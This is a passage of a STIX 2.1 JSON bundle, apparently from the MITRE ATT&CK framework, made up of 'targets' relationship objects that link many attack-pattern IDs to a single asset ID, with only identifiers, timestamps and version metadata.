"2024-07-01T10:37:15.826839", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f3a29e8b-dab9-4b2b-b1e2-f9ff8b952372", "created": "2024-07-01T10:37:15.826847", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826849", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b6ea433-6784-4e2a-a5bb-e24b1879ae9a", "created": "2024-07-01T10:37:15.826857", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826859", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b31cb8f8-07ba-4d4d-8c09-dbd6ed021f4b", "created": "2024-07-01T10:37:15.826867", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826869", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--408f8180-f83f-4447-9d7c-c4abd28b7353", "created": "2024-07-01T10:37:15.826877", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826879", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ac94f84-dbbf-4639-844b-6cf425d006a7", "created": "2024-07-01T10:37:15.826887", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826889", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b9f2be2-80bc-446e-a45f-c0c96edddccc", "created": "2024-07-01T10:37:15.826897", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826899", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--97021d84-3cf0-4e09-a277-1d939f17971b", "created": "2024-07-01T10:37:15.826907", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826909", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87684f2f-f785-4529-9b5f-cc5ff55b60c6", "created": "2024-07-01T10:37:15.826917", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826919", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14b84e19-bc58-4863-bba8-1e083c00c0ea", "created": "2024-07-01T10:37:15.826927", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826929", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1f0eb2c-a455-47d4-bdd2-1e7268199ec8", "created": "2024-07-01T10:37:15.826937", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826939", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b5d8705d-a1c6-4daf-90e2-7532c12f3c71", "created": "2024-07-01T10:37:15.826948", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826950", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e0b11cc2-7519-4d23-8913-be1cbfecaf18", "created": "2024-07-01T10:37:15.826958", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826960", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c96e503-6c2d-48a5-aaea-f4e9eda996f5", "created": "2024-07-01T10:37:15.826968", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826970", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2c9e9a4-bd86-441b-9430-f327defb9994", "created": "2024-07-01T10:37:15.826978", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826981", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a234016-f7a3-4d82-9e89-c34cde74ebf8", "created": "2024-07-01T10:37:15.826989", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826991", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--262ab8c3-7f07-490d-a02b-c107a4911853", "created": "2024-07-01T10:37:15.826999", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827001", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf282350-15be-4692-98b0-76aabc772b78", "created": "2024-07-01T10:37:15.827009", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827011", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8c8f0c36-f36d-4165-bd2d-79674ebade44", "created": "2024-07-01T10:37:15.827019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d2dae88-074a-4d1b-b936-87a37e190859", "created": "2024-07-01T10:37:15.827029", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827031", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--68931a9a-ae1e-476d-96e8-090a1e42118d", "created": "2024-07-01T10:37:15.827079", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827082", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87249551-feb2-4abd-acd9-7e0d3f920ca0", "created": "2024-07-01T10:37:15.827091", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827093", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24ce8bb4-5ae1-4e20-ac2d-5a2c22a8ffcc", "created": "2024-07-01T10:37:15.827101", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827103", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b9d29dc0-9b9c-49ae-80e4-22318a51b087", "created": "2024-07-01T10:37:15.827111", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827113", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31d3bc36-75e4-499e-a8fb-ea32bdc25f16", "created": "2024-07-01T10:37:15.827121", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827123", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a89ffcc6-9dcc-40fb-aa71-499ee89b367e", "created": "2024-07-01T10:37:15.827131", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827133", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--00b7e714-d262-417f-b6d4-099a85f53d7e", "created": "2024-07-01T10:37:15.827141", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827143", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7556cb4b-0245-4a21-b099-eadc6e1f819a", "created": "2024-07-01T10:37:15.827151", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827153", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c0e220a-343b-4c4b-a141-d1d33676c076", "created": "2024-07-01T10:37:15.827161", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827163", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--339fc82d-35cf-4d53-ad87-6c761eb3f4cf", "created": "2024-07-01T10:37:15.827171", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827173", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6145f89-0567-4e0a-934c-cb217bd12f00", "created": "2024-07-01T10:37:15.827181", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827183", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c47e8d5c-1bea-4ae3-b0da-224007ef335d", "created": "2024-07-01T10:37:15.827191", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827193", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b723274b-4c25-472f-aba9-58325b0ef572", "created": "2024-07-01T10:37:15.827201", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827203", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f0c96f5-bb97-4ce7-b596-a6185c5d69b8", "created": "2024-07-01T10:37:15.827211", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827213", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c90c9814-1cfa-4ead-9191-f602aa9d61d7", "created": "2024-07-01T10:37:15.827221", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827223", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1364d6d-e4ae-4e0b-80f6-19a7a7214de1", "created": "2024-07-01T10:37:15.827231", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827233", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--271e42ce-857a-467e-b335-7cdae83289e6", "created": "2024-07-01T10:37:15.827241", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827243", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d7b00edc-2b14-4faf-8586-82f45407fa1e", "created": "2024-07-01T10:37:15.827251", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827253", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f939438-6da7-4844-ad4f-bfe665f53066", "created": "2024-07-01T10:37:15.827261", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827263", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--042f6554-8df0-4809-81a7-b4f5a261f3fa", "created": "2024-07-01T10:37:15.827271", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827273", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f354abdf-02b9-4468-a653-d7c54969b8d4", "created": "2024-07-01T10:37:15.827281", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827283", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f8e668e-0aea-4e47-b991-e8f0d44493de", "created": "2024-07-01T10:37:15.827291", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827293", "description": "", "relationship_type": "targets", "source_ref": 